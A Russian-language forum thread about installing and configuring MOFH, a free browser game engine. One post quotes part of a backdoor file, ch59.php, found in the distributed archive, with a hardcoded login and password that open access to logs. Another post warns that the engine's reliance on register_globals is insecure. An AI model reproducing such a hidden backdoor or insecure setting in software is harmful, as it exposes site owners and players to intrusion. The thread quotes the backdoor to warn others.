[Движок] MOFH - Браузерная он-лайн игра (типо БК)

т.е. ты хочешь что бы в автоматическом виде, при оплате ВИП услуг, сразу начислялась в игре. - Нет этого нету.
 
Вот недостающие during.php и orden.php
 

Вложения

  • during_and_orden.zip
    4,3 KB · Просмотры: 55
Нужно в базе данных поставить себе орден 8 если я не ошибаюсь, и у вас автоматически появится точка входа в админцентр!
 
Кстати типо такого мы ставили и довольно успешно, правда тогда еще мало че переделывали и исправляли, но и на 50% рабочем коде у нас была уйма поситителей.
 
зайди в базу найди таблицу users найди свой логин, найли поле и туда впиши
 
скачал поставил.. вопрос.. если в игре внутренняя валюта которую к примеру можно покупать за web money
 
vmnetwork
Есть смотри в базе тыблицу users поле ekr

Tarasav
Надо рабочее? пиши в ПМ, только сразу буджет кокой, и только реальный...
 
От бекдора архив почистили?
Я вот нашёл файлик ch59.php в корне www

там есть вот такое чудо в начале:

Код:
<?php
Error_Reporting(E_ALL & ~E_NOTICE);
$admin_logen="Loger";  
$admin_passward="GdsSFsa333sfFasa";  
if ($_POST["submit"]<1){if(($usirname==$admin_logen) and ($passward==$admin_passward)){
setcookie(usirname,$usirname);
setcookie(passward,$passward);
setcookie(submit,www);

В общем посмотрел, это доступ к логам и лог чату, советую имя файлика сменить и пароль с логином поменять) чё ещё найду скажу)
 
админка

скажите плизз как залесть под админом? не заходит в adm.php
 
Вобщем подведу итог.
Тема мной полностью прочитана и может сэкономлю немного времени всем остальным.

Я давно сталкивался с этим скриптом и в данный момент лучшей халявы вы не найдете. В первом посту все описано подробно, причем автор темы не гнушается по несколько раз отвечать на одинаковые вопросы. Единственное в процессе обсуждения выложено несколько файлов, которые вам потребуются при установке и настройке скрипта. + практика доработки хоть как то описана и вам не придется додумываться самим.

З.ы. Повторюсь Без начального знания PHP и хоть какой практики установки скриптов и движков лучше не пробовать.

мое мнение по двигу:

Если вы решили поставить двиг на локалный хостинг для малой аудитории внутренней сети, то вы нашли то что нужно. Однако для платного хоста потребуются настройки которые за частую не исполюзуются для остальных проэктов , да и не все хост провайдеры дают возможность установить регистер_глобал_он.

Лично мне этот скрипт внушает недоверие именно по этой причине. Даже если пределать диз проэкта и попробовать запустить как доработанную или переделанную версию то безопастность при не большом желании ламеров оставляет желать лучшего.

Т.е. функция глобал_он как уже писали это самоубийство еще не родившегося проекта.

Поправьте меня если в чем то не прав.
Автору уже кликал спасибо и выражаю письменно тоже самое за интересную тему, прикольный двиг и терпение к тупарям и ленивым пользователям.
 
Назад
Сверху